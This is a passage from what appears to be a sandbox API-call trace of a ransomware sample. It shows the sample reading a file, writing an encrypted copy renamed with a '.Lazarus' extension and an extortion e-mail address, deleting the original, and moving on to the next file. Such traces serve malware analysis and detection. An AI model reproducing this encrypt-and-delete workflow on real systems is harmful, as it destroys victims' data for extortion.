CloseHandle (hObject=0x410) returned 1 [0072.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0072.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0072.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0072.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0072.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0072.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0072.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0072.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0072.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0072.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0072.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0072.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0072.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0072.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0072.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0072.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0072.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0072.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.029] AreFileApisANSI () returned 1 [0072.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0072.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 36 [0072.029] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf)) returned 1 [0072.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.029] AreFileApisANSI () returned 1 [0072.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0072.029] GetLastError () returned 0x0 [0072.029] SetLastError (dwErrCode=0x0) [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4ddc8 [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0072.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0072.030] GetLastError () returned 0x0 [0072.030] SetLastError (dwErrCode=0x0) [0072.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0072.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0072.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69490 [0072.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0072.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76188 [0072.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0072.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0072.030] AreFileApisANSI () returned 1 [0072.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0072.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x80a30 [0072.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76188, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0072.030] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.134] GetFileType (hFile=0x410) returned 0x1 [0072.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0072.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.134] AreFileApisANSI () returned 1 [0072.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0072.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 36 [0072.134] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.134] GetFileType (hFile=0x418) returned 0x1 [0072.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0072.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.135] GetLastError () returned 0x0 [0072.135] SetLastError (dwErrCode=0x0) [0072.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.135] GetLastError () returned 0x0 [0072.135] SetLastError (dwErrCode=0x0) [0072.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.135] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.135] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0xfaf, lpOverlapped=0x0) returned 1 [0072.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0072.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0072.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0072.137] GetLastError () returned 0x0 [0072.137] SetLastError (dwErrCode=0x0) [0072.137] GetLastError () returned 0x0 [0072.137] SetLastError (dwErrCode=0x0) [0072.137] GetLastError () returned 0x0 [0072.137] SetLastError (dwErrCode=0x0) [0072.137] ReadFile (in: hFile=0x418, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0072.137] GetLastError () returned 0x0 [0072.137] SetLastError (dwErrCode=0x0) [0072.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xf) returned 0x7d4c8 [0072.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0072.137] GetLastError () returned 0x0 [0072.137] SetLastError (dwErrCode=0x0) [0072.138] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0072.138] WriteFile (in: hFile=0x410, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0xfb0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0xfb0, lpOverlapped=0x0) returned 1 [0072.139] GetLastError () returned 0x0 [0072.139] SetLastError (dwErrCode=0x0) [0072.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0072.139] GetLastError () returned 0x0 [0072.139] SetLastError (dwErrCode=0x0) [0072.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0072.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0072.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0072.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0072.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0072.139] CloseHandle (hObject=0x410) returned 1 [0072.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.141] CloseHandle (hObject=0x418) returned 1 [0072.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0072.141] AreFileApisANSI () returned 1 [0072.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0072.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 36 [0072.141] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.142] GetFileType (hFile=0x418) returned 0x1 [0072.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.142] GetLastError () returned 0xb7 [0072.142] SetLastError (dwErrCode=0xb7) [0072.143] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0072.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0072.143] CloseHandle (hObject=0x418) returned 1 [0072.144] AreFileApisANSI () returned 1 [0072.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0072.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69350 [0072.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x69350, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 36 [0072.144] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf")) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0072.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.145] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0072.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0072.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0072.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0072.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0072.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0072.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0072.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0072.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0072.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0072.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0072.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0072.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0072.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0072.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0072.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0072.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0072.146] AreFileApisANSI () returned 1 [0072.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0072.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0072.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0072.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0072.147] AreFileApisANSI () returned 1 [0072.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0072.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0072.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 45 [0072.147] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.147] GetFileType (hFile=0x418) returned 0x1 [0072.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.147] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0072.147] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0072.148] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0072.148] CloseHandle (hObject=0x418) returned 1 [0072.148] AreFileApisANSI () returned 1 [0072.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0072.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0072.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned 45 [0072.148] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.148] GetFileType (hFile=0x418) returned 0x1 [0072.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.149] CloseHandle (hObject=0x418) returned 1 [0072.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0072.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0072.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0072.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0072.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0072.149] HeapFree (in: 